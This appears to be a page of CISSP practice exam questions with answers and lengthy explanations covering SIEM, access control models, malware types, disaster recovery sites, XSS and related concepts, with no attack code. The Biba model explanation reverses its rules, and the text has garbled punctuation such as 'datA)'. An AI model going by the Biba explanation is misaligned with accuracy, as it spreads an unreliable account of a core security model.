Visit here for our full ISC CISSP exam dumps and practice test questions.
Question 121
Which of the following best describes a Security Information and Event Management (SIEM) system?
A) A system that encrypts all network traffic
B) A tool that collects, analyzes, and correlates security events from multiple sources
C) A firewall that blocks unauthorized access
D) A backup management solution
Answer: B) A tool that collects, analyzes, and correlates security events from multiple sources
Explanation:
A Security Information and Event Management (SIEM) system is a centralized cybersecurity platform designed to collect, aggregate, and analyze logs and events from a wide variety of sources, including servers, firewalls, intrusion detection systems, endpoints, databases, and applications. By consolidating this information, SIEM provides organizations with a unified view of their IT environment, enabling real-time monitoring of security events and early detection of potential threats or anomalies.
SIEM systems use correlation rules, behavioral analytics, and pattern recognition to identify suspicious activity that might otherwise go unnoticeD) These capabilities allow security teams to detect advanced persistent threats, insider threats, and other malicious activities in real time. Once detected, alerts generated by the SIEM system support rapid incident response, helping organizations contain threats, reduce potential damage, and minimize downtime.
Beyond real-time monitoring, SIEM also supports forensic investigations by maintaining detailed logs of historical events. This enables security analysts to trace the origin and progression of incidents, identify compromised systems, and understand attack methodologies. Additionally, SIEM plays a crucial role in regulatory compliance by providing audit-ready reports, documenting access controls, and demonstrating adherence to industry standards such as PCI DSS, HIPAA, or ISO 27001.
Effective SIEM implementation requires careful configuration, continuous tuning of correlation rules, and regular review of alerts to minimize false positives while ensuring meaningful notifications. Organizations can also integrate SIEM with other security tools, such as threat intelligence platforms and endpoint detection and response (EDR) systems, to enhance its capabilities.
Overall, a SIEM system enhances visibility, strengthens threat detection, improves incident response, and supports informed decision-making for cybersecurity strategy, making it a central component of modern organizational security operations.
Question 122
Which access control model enforces mandatory rules based on data classification and user clearance levels?
A) Discretionary Access Control (DAC)
B) Mandatory Access Control (MAC)
C) Role-Based Access Control (RBAC)
D) Attribute-Based Access Control (ABAC)
Answer: B) Mandatory Access Control (MAC)
Explanation:
Mandatory Access Control (MAC) is a highly secure access control model in which access decisions are strictly governed by system-enforced policies rather than by the discretion of individual users. In this model, every piece of data is assigned a security classification, such as Confidential, Secret, or Top Secret, and every user is assigned a clearance level corresponding to their authorization and trustworthiness. Users can access only the data for which their clearance meets or exceeds the classification level, and they cannot override, bypass, or modify these permissions. This strict control ensures that sensitive information is protected from unauthorized access, reducing the risk of accidental disclosure or deliberate misuse.
MAC is commonly implemented in government, military, and other high-security environments where maintaining strict confidentiality and integrity of information is critical. For example, intelligence agencies often rely on MAC to ensure that sensitive national security information is accessible only to authorized personnel, preventing lower-level employees or contractors from accessing highly classified materials. Beyond controlling access, MAC also supports detailed auditing and logging capabilities, enabling organizations to track user activity, monitor access patterns, and detect potential security violations. This makes it easier to investigate incidents, enforce accountability, and comply with regulatory requirements. By enforcing access policies at the system level rather than leaving decisions to individual users, MAC provides a robust, consistent, and highly reliable method for protecting critical information assets, particularly in environments where data security cannot be compromised under any circumstances.
Question 123
Which of the following best describes phishing attacks?
A) Exploiting software vulnerabilities
B) Sending fraudulent messages to trick users into revealing sensitive information
C) Using malware to encrypt files
D) Intercepting network traffic
Answer: B) Sending fraudulent messages to trick users into revealing sensitive information
Explanation:
Phishing is a form of social engineering attack in which attackers manipulate individuals into revealing sensitive information such as usernames, passwords, financial data, or other confidential details. Rather than exploiting technical vulnerabilities, phishing targets human behavior, relying on deception, urgency, or trust to trick users into taking actions that compromise security. Attackers often impersonate trusted entities, such as banks, colleagues, or well-known service providers, using emails, messaging applications, phone calls, or fake websites that appear legitimate.
There are several common variants of phishing attacks. Spear phishing targets specific individuals or small groups, tailoring messages based on research about the target to increase credibility and success rates. Whaling attacks focus on high-profile executives or decision-makers, aiming to gain access to sensitive corporate information or authorize fraudulent transactions. Clone phishing involves replicating a legitimate message previously sent to the victim, altering it with malicious links or attachments to deceive recipients. Other evolving techniques include vishing (voice phishing) and smishing (SMS phishing).
Because phishing exploits human factors, user awareness and training are critical components of defense. Organizations implement multiple mitigation strategies to reduce the risk and impact of phishing attacks. Employee education programs, simulated phishing exercises, and awareness campaigns help users recognize suspicious messages. Technical controls such as multi-factor authentication (MFA), email filters, URL inspection tools, and verification procedures further protect sensitive datA)
Regular phishing simulations reinforce vigilance, allowing organizations to assess their preparedness and identify areas for improvement. By combining education, technological safeguards, and proactive monitoring, organizations can reduce the likelihood of successful phishing attacks, protect confidential information, and strengthen their overall cybersecurity posture.
Question 124
Which type of malware is designed to secretly monitor user activities and report back to an attacker?
A) Spyware
B) Worm
C) Ransomware
D) Trojan
Answer: A) Spyware
Explanation:
Spyware is a type of malicious software designed to secretly monitor and collect information about a user’s activity without their knowledge or consent. It can capture a wide range of sensitive data, including keystrokes, browsing habits, login credentials, financial information, personal identification details, and other confidential data, and then transmit this information to attackers for malicious purposes. Spyware can be installed on a system through various methods, including phishing emails, malicious downloads, infected websites, or by being bundled with seemingly legitimate software. Once installed, spyware can operate covertly in the background, often slowing system performance, altering settings, or opening backdoors for additional malware.
The impact of spyware extends beyond individual privacy breaches. Organizations can suffer data leaks, intellectual property theft, and unauthorized access to internal networks. Individuals are at risk of identity theft, financial fraud, and compromise of personal communications. Combating spyware requires a multi-layered approach. Endpoint protection, up-to-date antivirus software, and regular system scanning are essential to detect and remove spyware before it causes damage.
User education is equally important, as many infections occur due to unsafe downloading practices, clicking on suspicious links, or failing to recognize phishing attempts. Implementing strict software installation policies, regularly updating operating systems and applications, and monitoring network activity can further reduce the risk of spyware infiltration. Because spyware often operates silently, ongoing vigilance and comprehensive security controls are critical to prevent continuous monitoring, unauthorized data collection, and potential long-term damage to both personal and organizational systems.
Question 125
Which of the following is the most effective method for mitigating man-in-the-middle (MITM) attacks?
A) Using strong encryption and certificate validation
B) Installing antivirus software
C) Implementing firewalls only
D) Limiting physical access to servers
Answer: A) Using strong encryption and certificate validation
Explanation:
Man-in-the-middle (MITM) attacks occur when an attacker secretly intercepts, relays, or modifies communications between two parties, often without either party realizing the compromise. These attacks can target a variety of communication channels, including web traffic, emails, instant messaging, or other network-based interactions. By positioning themselves between the sender and receiver, attackers can steal sensitive information such as login credentials, financial data, or personal details, as well as manipulate transactions or inject malicious content, potentially causing financial or reputational harm.
The most effective mitigation against MITM attacks involves the use of strong encryption protocols such as TLS (Transport Layer Security) or SSL (Secure Sockets Layer), which secure data in transit and prevent attackers from reading or modifying intercepted messages. Certificate validation ensures that users are communicating with legitimate parties, while mutual authentication—where both parties verify each other’s identities—further reduces the risk of impersonation. Virtual Private Networks (VPNs) and secure network configurations provide additional layers of protection, particularly when using untrusted or public networks.
Monitoring network traffic for unusual patterns or anomalies is another key defense strategy, helping to detect potential MITM activity early. Technical safeguards must be complemented by user education and training, as awareness of phishing attempts, suspicious links, and insecure connections significantly reduces the likelihood of compromise.
By correctly implementing encryption, authentication, and monitoring, organizations can ensure the confidentiality, integrity, and authenticity of communications. A combination of proactive technical measures and informed user behavior establishes a robust defense against MITM attacks, safeguarding sensitive data and maintaining trust in digital communications.
Question 126
Which security principle prevents one user from writing data to a lower integrity level?
A) Bell-LaPadula
B) Biba
C) Clark-Wilson
D) Brewer and Nash
Answer: B) Biba
Explanation:
The Biba integrity model is a security framework that focuses on preserving the integrity of data within an information system. Unlike confidentiality-based models such as Bell-LaPadula, which aim to prevent unauthorized access to sensitive information, Biba’s primary objective is to prevent the corruption of data by ensuring that it remains accurate, consistent, and trustworthy. Its central principle, often summarized as “no write down,” dictates that subjects at higher integrity levels are prohibited from writing to objects at lower integrity levels. This prevents highly trusted or sensitive data from being modified by less trustworthy sources.
Complementing the “no write down” rule, Biba also incorporates the “no read up” principle in some implementations, which prevents subjects from reading data at higher integrity levels, thereby reducing the risk of using potentially unverified or untrusted datA) Together, these rules enforce strict integrity policies, ensuring that data flows in a manner that maintains trustworthiness throughout the system.
The Biba model is commonly applied in environments where accurate and uncorrupted data is critical, such as financial systems, industrial control systems, healthcare applications, and scientific research platforms. Implementing the Biba model involves defining integrity levels for both subjects and objects, enforcing access control rules based on these levels, and auditing system modifications to detect violations or unauthorized changes.
By systematically controlling how data can be read or modified according to integrity levels, the Biba model helps organizations maintain reliable information, prevent accidental or malicious corruption, and ensure compliance with regulatory or operational standards. Overall, it provides a structured approach to safeguarding data integrity, complementing confidentiality and availability measures within a comprehensive security strategy.
Question 127
Which type of backup captures all changes since the last full backup?
A) Full backup
B) Differential backup
C) Incremental backup
D) Snapshot backup
Answer: B) Differential backup
Explanation:
A differential backup is a type of data backup that captures all the changes made since the last full backup. This approach differs from incremental backups, which only record the changes made since the most recent backup of any type, whether full or incremental. Because differential backups include all changes since the last full backup, they tend to grow larger over time compared to incremental backups. However, this characteristic makes differential backups much simpler and faster to restore. During recovery, only the last full backup and the most recent differential backup are required, eliminating the need to sequentially apply multiple incremental backups. This reduces the risk of errors during restoration and can significantly speed up the recovery process.
Organizations often implement differential backups as part of a broader data protection strategy to balance several factors, including storage usage, backup time, and recovery speeD) While differential backups consume more storage than incremental backups, they offer a compromise between the fast restoration of full backups and the storage efficiency of incremental backups. Proper scheduling of differential backups is crucial; for example, a weekly full backup combined with daily differential backups is a common approach to ensure timely recovery while managing storage requirements.
Equally important is regular testing of backups. Testing ensures that the backup files are complete, consistent, and fully restorable in the event of hardware failure, cyberattacks, or other disasters. Without periodic verification, organizations may discover too late that backups are corrupted, incomplete, or otherwise unusable. In summary, differential backups provide a practical and efficient solution for organizations seeking a reliable, easily restorable backup system that balances storage demands with operational efficiency and risk mitigation.
Question 128
Which of the following best describes a cold site in disaster recovery planning?
A) A fully operational backup facility
B) A site with basic infrastructure but no pre-installed systems or data
C) A mobile temporary recovery facility
D) A cloud-based failover system
Answer: B) A site with basic infrastructure but no pre-installed systems or data
Explanation:
A cold site is a type of disaster recovery (DR) facility designed to provide an organization with an alternate location for operations in the event of a disaster or system failure. Unlike hot or warm sites, a cold site offers only the essential infrastructure, such as power, cooling, network connectivity, and physical space, but it does not include pre-installed hardware, software, or live datA) As a result, activating a cold site requires transporting and setting up servers, workstations, and other IT equipment, as well as restoring data from backups before operations can resume. This process generally leads to longer recovery times compared to warm or hot sites, making cold sites suitable for organizations that can tolerate extended downtime without significant operational impact.
Despite the longer recovery period, cold sites are often chosen for their cost-effectiveness. Since they do not require the continuous maintenance of active systems or up-to-date data replication, ongoing operational expenses are relatively low. Organizations can maintain a cold site as an emergency backup while focusing resources on primary systems.
Effective cold site planning involves careful preparation, including documenting recovery procedures, ensuring backup data integrity, arranging equipment logistics, and establishing communication protocols. Regular testing and drills are essential to validate that personnel can quickly deploy hardware, restore software, and recover critical applications during an actual disaster. By addressing these considerations, organizations can reduce potential downtime, minimize data loss, and maintain business continuity even when a cold site is the chosen disaster recovery strategy.
Question 129
Which of the following best describes a warm site in disaster recovery planning?
A) A site with basic infrastructure only
B) A fully operational backup site ready for immediate use
C) A site with partial pre-installed systems and recent backups
D) A mobile temporary facility
Answer: C) A site with partial pre-installed systems and recent backups
Explanation:
A warm site is a type of disaster recovery facility that provides pre-installed hardware, software, and network infrastructure, along with regular backups of critical datA) Unlike a cold site, which requires organizations to install and configure systems from scratch, a warm site is partially configured and maintained, allowing for a quicker resumption of operations in the event of a disaster. While it does not offer the instant readiness of a hot site, a warm site strikes a balance between cost and recovery speed, making it a practical solution for medium-priority business functions that cannot afford prolonged downtime but do not require full 24/7 availability.
Warm sites rely on regular synchronization of data and system updates to ensure that information is relatively current. This often involves automated data replication or scheduled transfers from the primary site. Maintenance of hardware, software, and network configurations is also essential to keep the site operational and compatible with the organization’s production environment. Additionally, routine testing of the warm site ensures that systems can be activated efficiently and reliably when needeD) Such tests help identify potential issues, including software incompatibilities, hardware failures, or network misconfigurations, before an actual disaster occurs.
By providing a partially ready environment, warm sites enable organizations to reduce downtime and resume critical operations faster than cold sites while avoiding the higher costs associated with hot sites. They are especially useful for businesses that need to maintain continuity for essential services but can tolerate a short delay in recovery. Overall, warm sites offer a practical, cost-effective, and moderately fast disaster recovery option, combining pre-configured infrastructure with ongoing data synchronization and testing to ensure operational readiness when emergencies strike.
Question 130
Which of the following access control models assigns permissions based on job functions and responsibilities?
A) Discretionary Access Control (DAC)
B) Mandatory Access Control (MAC)
C) Role-Based Access Control (RBAC)
D) Attribute-Based Access Control (ABAC)
Answer: C) Role-Based Access Control (RBAC)
Explanation:
Role-Based Access Control (RBAC) is a widely used access management framework that assigns system permissions to users based on their roles within an organization. In RBAC, each role is defined with a specific set of privileges necessary to perform the job functions associated with that role. Users inherit the permissions of the roles they are assigned, ensuring that they can only access the data, applications, and resources required for their responsibilities. This approach enforces the principle of least privilege, helping to minimize the risk of unauthorized access, accidental misuse, or data breaches.
One of the key benefits of RBAC is its ability to simplify access management. By grouping users into roles rather than assigning individual permissions, organizations reduce administrative complexity and the potential for errors in manual access assignments. For example, in a corporate environment, an “HR Manager” role might be granted access to employee records, payroll systems, and reporting tools, while an “IT Support” role would have permissions limited to system configuration, troubleshooting tools, and user support functions. This clear separation of duties not only enhances security but also supports compliance with regulatory requirements.
RBAC also provides flexibility and scalability. When employees change responsibilities, receive promotions, or transfer to different departments, access rights can be adjusted efficiently by updating role assignments rather than modifying individual permissions for each user. Additionally, RBAC supports auditing and accountability, as administrators can easily track which roles have access to specific resources and identify any unusual or unauthorized activity.
Overall, RBAC is a practical and efficient access control model that balances security, operational efficiency, and compliance by structuring permissions around organizational roles rather than individual users, providing both control and adaptability in managing system access.
Question 131
Which of the following best describes a hot site in disaster recovery planning?
A) A site with basic infrastructure only
B) A site with partially installed systems and recent backups
C) A fully operational backup facility with real-time data replication
D) A mobile temporary facility
Answer: C) A fully operational backup facility with real-time data replication
Explanation:
A hot site is a fully operational disaster recovery facility that maintains complete infrastructure, including servers, storage, network hardware, and software, along with real-time or near-real-time replication of critical systems and data from the primary site. Unlike cold or warm sites, a hot site is continuously updated and ready to take over operations almost immediately following a disaster. This design allows organizations to minimize downtime and maintain business continuity, ensuring that critical operations can continue with little to no interruption. Due to the need for duplicate hardware, software licenses, network configurations, and ongoing data synchronization, hot sites are the most expensive type of recovery site, but they provide the fastest recovery capabilities.
Hot sites are particularly crucial for organizations with strict Recovery Time Objectives (RTOs), high availability requirements, or mission-critical systems that cannot tolerate prolonged outages. Examples include financial institutions, healthcare providers, e-commerce platforms, and cloud service providers, all of which rely on continuous access to systems and data to prevent financial loss, regulatory penalties, or reputational damage. By maintaining fully up-to-date copies of applications and data, hot sites ensure that services remain accessible even during catastrophic events such as natural disasters, cyberattacks, or infrastructure failures.
In addition to hardware and software readiness, successful hot sites require regular testing, monitoring, and maintenance to verify that systems function correctly and that data replication remains consistent. This proactive approach ensures that the disaster recovery plan works as intended and that any potential issues can be resolved before an actual emergency occurs. Overall, hot sites provide organizations with the highest level of preparedness, enabling near-instantaneous recovery and uninterrupted service for critical business functions, albeit at a significant cost.
Question 132
Which of the following best describes a zero-day vulnerability?
A) A vulnerability that has been publicly disclosed and patched
B) A vulnerability unknown to the vendor with no available patch
C) A vulnerability affecting only legacy systems
D) A vulnerability exploited after patching
Answer: B) A vulnerability unknown to the vendor with no available patch
Explanation:
A zero-day vulnerability is a security flaw in software, hardware, or firmware that is unknown to the vendor or developer, meaning no official patch, fix, or mitigation is available at the time of discovery. Because there is no vendor-provided defense, attackers can exploit these vulnerabilities immediately, often causing severe consequences. Exploitation can lead to system compromise, data theft, privilege escalation, unauthorized access, ransomware deployment, or other forms of malicious activity. High-profile instances of zero-day exploitation include the Stuxnet worm, which leveraged multiple zero-day vulnerabilities to disrupt industrial control systems, and the EternalBlue exploit, which was used in the widespread WannaCry ransomware attack.
Zero-day vulnerabilities are particularly dangerous because organizations cannot rely on traditional patching or updates for protection. The absence of an official fix creates a window of opportunity for attackers, making proactive defense strategies critical. Organizations can implement multiple layers of defense to reduce the risk and impact of exploitation. Intrusion detection and prevention systems (IDS/IPS), endpoint protection platforms, and behavioral monitoring can help identify unusual or suspicious activity that may indicate a zero-day attack. Network segmentation and strict access controls further limit the potential damage if a zero-day is exploiteD)
Threat intelligence feeds and ongoing vulnerability research are also valuable for detecting emerging zero-day exploits, allowing organizations to apply temporary mitigations, such as disabling vulnerable features, implementing workarounds, or enhancing monitoring for abnormal behavior. Employee awareness and security training can further reduce risk by helping staff recognize suspicious activity.
Question 133
Which type of attack involves injecting malicious scripts into web applications viewed by other users?
A) Cross-site scripting (XSS)
B) SQL injection
C) Man-in-the-middle attack
D) Phishing
Answer: A) Cross-site scripting (XSS)
Explanation:
Cross-site scripting (XSS) attacks occur when attackers inject malicious scripts into web pages that are subsequently viewed by other users. These scripts can steal sensitive information, such as cookies, session tokens, or user credentials, and can also manipulate page content to perform unauthorized actions on behalf of the user. XSS attacks exploit vulnerabilities in web applications, often caused by insufficient input validation or improper output encoding, allowing attackers to execute scripts in the context of a victim’s browser.
There are three main types of XSS attacks. Stored XSS, also called persistent XSS, occurs when malicious scripts are permanently stored on a server, such as in databases, message boards, or user profiles, and executed whenever a user accesses the infected content. Reflected XSS involves scripts embedded in a URL or request that are immediately reflected back and executed by the browser, often through phishing or malicious links. DOM-based XSS occurs entirely on the client side, where scripts manipulate the Document Object Model (DOM) of a web page, executing in the victim’s browser without direct server involvement.
Mitigation of XSS attacks requires a combination of secure coding practices and browser-level defenses. Developers should rigorously validate and sanitize user inputs, encode outputs, and implement proper context-aware escaping. Content Security Policies (CSPs) can help restrict the execution of untrusted scripts and reduce the impact of potential XSS vulnerabilities. Regular security testing, including penetration tests and automated scanning, is essential to identify and remediate weaknesses before attackers can exploit them.
XSS attacks emphasize the importance of web application security, demonstrating that even seemingly minor vulnerabilities can compromise user data and trust. By adopting robust input validation, output encoding, and security-focused development practices, organizations can protect users against client-side threats and maintain the integrity and reliability of their web applications.
Question 134
Which security model focuses on maintaining the integrity of data through well-formed transactions and auditing?
A) Bell-LaPadula
B) Clark-Wilson
C) Biba
D) Brewer and Nash
Answer: B) Clark-Wilson
Explanation:
The Clark-Wilson security model is designed to enforce data integrity in information systems by ensuring that all modifications to critical data are performed in a controlled, authorized manner. Its core principle is the use of well-formed transactions, which guarantee that data remains consistent, accurate, and trustworthy after any operation. Unlike models that focus solely on access restrictions, Clark-Wilson emphasizes that only specific, authorized programs—known as Transformation Procedures (TPs)—can modify protected datA) This ensures that all changes are legitimate and conform to predefined business rules and policies.
Another key feature of the Clark-Wilson model is the enforcement of separation of duties. By dividing responsibilities among multiple users and processes, the model prevents a single individual from performing actions that could compromise data integrity or enable fraudulent activities. In addition, the model requires auditing and certification of transactions to verify that all operations comply with organizational policies. This auditing process provides accountability, transparency, and evidence that proper procedures were followeD)
The Clark-Wilson model is particularly suited to commercial, financial, and regulatory environments, where the accuracy and reliability of data are essential for business operations, compliance, and decision-making. Examples include banking systems, payroll applications, and accounting software, where improper or unauthorized data modifications could result in significant financial or operational risks.
By combining controlled access through Transformation Procedures, enforcement of separation of duties, and auditing mechanisms, the Clark-Wilson model provides a practical framework to prevent unauthorized modifications, fraud, and errors. It ensures that critical data remains reliable and trustworthy, supporting the integrity and accountability required in high-stakes business environments.
Question 135
Which type of malware encrypts a victim’s files and demands payment for decryption?
A) Worm
B) Trojan
C) Ransomware
D) Spyware
Answer: C) Ransomware
Explanation:
Ransomware is a type of malicious software designed to disrupt access to a victim’s data or systems by encrypting files or locking users out of critical resources. Attackers then demand a ransom, typically in cryptocurrency, in exchange for restoring access. Ransomware can spread through a variety of attack vectors, including phishing emails, malicious attachments or downloads, compromised websites, and exploiting network vulnerabilities or unpatched software. Once executed, ransomware can rapidly propagate across networks, potentially affecting multiple systems and causing widespread operational disruption.
The consequences of a ransomware attack can be severe, impacting organizational operations, finances, and reputation. Beyond the immediate operational downtime, organizations may face regulatory penalties, data loss, and erosion of customer trust. High-profile ransomware incidents have demonstrated that even well-prepared organizations are vulnerable without robust preventive measures.
Preventive strategies focus on reducing attack surfaces and improving resilience. Regular and verified backups ensure that critical data can be restored without paying a ransom. Endpoint protection, intrusion detection systems, timely patch management, network segmentation, and access controls help prevent the initial infection or limit its spreaD) User education and phishing awareness training are crucial, as social engineering is a primary attack vector.
Incident response planning is equally important. Response plans should define steps for containment, investigation, data recovery, and communication while explicitly avoiding ransom payments, which can encourage further attacks. Coordinated testing of these plans ensures readiness in the event of an incident.
By combining technical controls, procedural safeguards, and policy enforcement, organizations can mitigate the risks associated with ransomware, maintain business continuity, and minimize financial and operational impact, ensuring that systems remain resilient against this increasingly prevalent threat.
Question 136
Which of the following best describes an Intrusion Detection System (IDS)?
A) A device that blocks unauthorized traffic
B) A system that detects and alerts on suspicious network or system activity
C) A tool that encrypts sensitive data
D) A backup and recovery tool
Answer: B) A system that detects and alerts on suspicious network or system activity
Explanation:
An Intrusion Detection System (IDS) is a security tool that monitors network traffic and host activity to identify malicious behavior, policy violations, or unusual actions that could indicate a security threat. IDS can be classified into two main types: network-based IDS (NIDS), which monitors network packets for suspicious patterns, and host-based IDS (HIDS), which observes activity on individual computers or servers, such as system logs, file changes, or user behavior. Unlike firewalls, which actively block or filter traffic, an IDS primarily generates alerts to notify security teams of potential threats, allowing for timely investigation and response.
IDS employs multiple detection techniques to identify security incidents. Signature-based detection compares activity against a database of known attack patterns, providing reliable identification of familiar threats. Anomaly detection identifies deviations from established baseline behavior, helping to uncover previously unknown or zero-day attacks. Behavioral monitoring focuses on user or system actions that may indicate malicious intent, such as unauthorized access attempts or unusual application usage.
By providing continuous monitoring and alerting, IDS enhances an organization’s situational awareness and supports incident response efforts. It also plays a crucial role in forensic investigations by maintaining records of network and host activity, which can be analyzed to understand the scope and origin of attacks.
Effective IDS deployment requires proper configuration, integration with other security tools such as Security Information and Event Management (SIEM) systems, and ongoing tuning to reduce false positives and ensure alerts are actionable. When implemented correctly, an IDS helps organizations detect and respond to threats more efficiently, protecting critical assets and supporting a comprehensive cybersecurity strategy.
Question 137
Which of the following attacks involves an attacker secretly intercepting and potentially altering communications between two parties?
A) Phishing
B) Man-in-the-middle attack
C) Replay attack
D) Denial-of-service attack
Answer: B) Man-in-the-middle attack
Explanation:
A man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts communications between two parties, positioning themselves between the sender and receiver to eavesdrop, alter, or manipulate transmitted data without detection. These attacks can compromise both the confidentiality and integrity of communications, enabling attackers to steal credentials, manipulate transactions, hijack sessions, inject malicious content, or exfiltrate sensitive information. MITM attacks can target various communication channels, including web traffic, emails, instant messaging, and other network-based interactions.
One of the most effective ways to prevent MITM attacks is the use of strong encryption protocols, such as TLS (Transport Layer Security) or SSL (Secure Sockets Layer), which ensure that intercepted data cannot be read or modifieD) Certificate validation is also critical to verify the authenticity of communicating parties, preventing attackers from impersonating legitimate services. Additional protections include mutual authentication, where both parties validate each other’s identities, and secure Virtual Private Networks (VPNs) to protect data over untrusted networks.
Organizations should also implement network monitoring and anomaly detection to identify unusual patterns of traffic or potential MITM activity. Logging and alerting systems help detect early signs of interception, providing time to respond before significant damage occurs.
User awareness is another key factor, as attackers often exploit human behavior through phishing or malicious links to facilitate MITM attacks. Educating users about secure communication practices, avoiding untrusted networks, and recognizing warning signs further reduces the risk.
In summary, MITM attacks highlight the importance of end-to-end encryption, proper authentication, network monitoring, and user vigilance. A combination of technical safeguards and informed behavior ensures the confidentiality, integrity, and trustworthiness of digital communications, mitigating the risks posed by interception attacks.
Question 138
Which of the following best defines a honeypot in cybersecurity?
A) A firewall that blocks attacks
B) A decoy system designed to attract attackers
C) A backup server for disaster recovery
D) A secure VPN endpoint
Answer: B) A decoy system designed to attract attackers
Explanation:
A honeypot is a deliberately vulnerable system designed to attract attackers and observe their activities without putting production systems at risk. It functions as a controlled environment where security teams can monitor malicious behavior, collect data on attack methods, and gain insights into the tools and techniques used by cybercriminals. Honeypots can be classified into low-interaction and high-interaction types. Low-interaction honeypots simulate limited services or systems, providing a basic environment that can detect automated attacks or simple probing attempts. High-interaction honeypots, on the other hand, offer fully functional system environments, allowing attackers to interact more extensively, which provides richer data about complex attack strategies, malware execution, and lateral movement techniques.
By analyzing the behavior of attackers in a honeypot, organizations can identify malware signatures, exploit methods, and potential vulnerabilities that could affect real systems. Honeypots also act as early warning systems, detecting intrusion attempts before critical assets are targeted, enabling proactive defense measures. They support security research by providing real-world data on emerging threats and trends in cybercrime, helping security teams refine intrusion detection rules, improve incident response processes, and strengthen overall security posture.
Proper isolation, network segmentation, and continuous monitoring are essential to ensure that attackers cannot use the honeypot as a stepping stone to access production systems. When implemented correctly, honeypots complement traditional security tools by offering intelligence that is difficult to obtain through passive monitoring alone. They play a valuable role in intrusion detection, threat analysis, and proactive defense strategies, helping organizations better understand attacker behavior and prepare for real-world cyber threats.
Question 139
Which term refers to the principle of granting users the minimum level of access necessary to perform their duties?
A) Separation of duties
B) Least privilege
C) Need-to-know
D) Role-based access control
Answer: B) Least privilege
Explanation:
The principle of least privilege is a fundamental security concept that ensures users, processes, and systems are granted only the minimum level of access necessary to perform their specific tasks. By limiting permissions to what is strictly required, this principle reduces the risk of accidental or intentional misuse of resources, helps contain the impact of compromised accounts, and prevents unauthorized actions that could lead to privilege escalation attacks. Implementing least privilege minimizes the potential attack surface and enhances overall system security.
Enforcement of least privilege is typically achieved through access control mechanisms, such as role-based access control (RBAC) or discretionary access control (DAC), which assign permissions based on roles, responsibilities, or task requirements. Regular review and auditing of access rights are essential to ensure that permissions remain appropriate over time, especially when users change roles, departments, or responsibilities. Automated tools can assist in detecting excessive permissions and enforcing corrective actions.
Combining the principle of least privilege with other security practices, such as separation of duties, monitoring, and logging, further strengthens security posture. Separation of duties ensures that critical actions require multiple individuals or approval steps, reducing the risk of insider threats or fraudulent activity. Continuous monitoring and auditing provide visibility into access patterns, allowing organizations to detect anomalies or unauthorized attempts to escalate privileges.
Adopting the principle of least privilege not only protects sensitive data and critical systems but also supports regulatory compliance and risk management. By granting only necessary access, organizations can maintain accountability, minimize potential damage from compromised accounts or insider threats, and create a more resilient and secure computing environment.
Question 140
Which of the following best describes a security audit?
A) Installation of antivirus software
B) A review and evaluation of security controls and practices
C) Routine patch deployment
D) Configuration of firewalls
Answer: B) A review and evaluation of security controls and practices
Explanation:
A security audit is a structured and formal evaluation of an organization’s information systems, policies, procedures, and controls to assess their effectiveness, compliance, and exposure to risks. These audits are designed to identify vulnerabilities, inefficiencies, and gaps in security practices, providing a comprehensive view of the organization’s cybersecurity posture. Security audits can be conducted internally by in-house teams or externally by independent auditors to ensure objectivity and adherence to recognized standards.
Audits typically examine multiple areas, including access management, network security, data protection, incident response, system configuration, and regulatory compliance. They verify whether existing controls are properly implemented and whether security policies are followed consistently across the organization. Findings from security audits highlight weaknesses or potential risks and include actionable recommendations for improvement. They also serve as evidence of accountability, demonstrating to management, regulators, and stakeholders that appropriate safeguards are in place and functioning.
Organizations leverage security audits to strengthen defenses, reduce operational and regulatory risks, and align with industry standards such as ISO 27001, NIST frameworks, PCI DSS, HIPAA, or other relevant regulations. Beyond compliance, audits support proactive risk management by identifying issues before they are exploited and guiding the implementation of corrective measures.
Regularly scheduled audits promote continuous improvement, enabling organizations to adapt to evolving threats and changes in technology or business processes. By providing visibility into security controls and processes, security audits not only enhance operational security but also foster a culture of accountability and vigilance. Ultimately, conducting comprehensive security audits ensures that organizations maintain resilience, protect sensitive information, and demonstrate a strong commitment to cybersecurity excellence.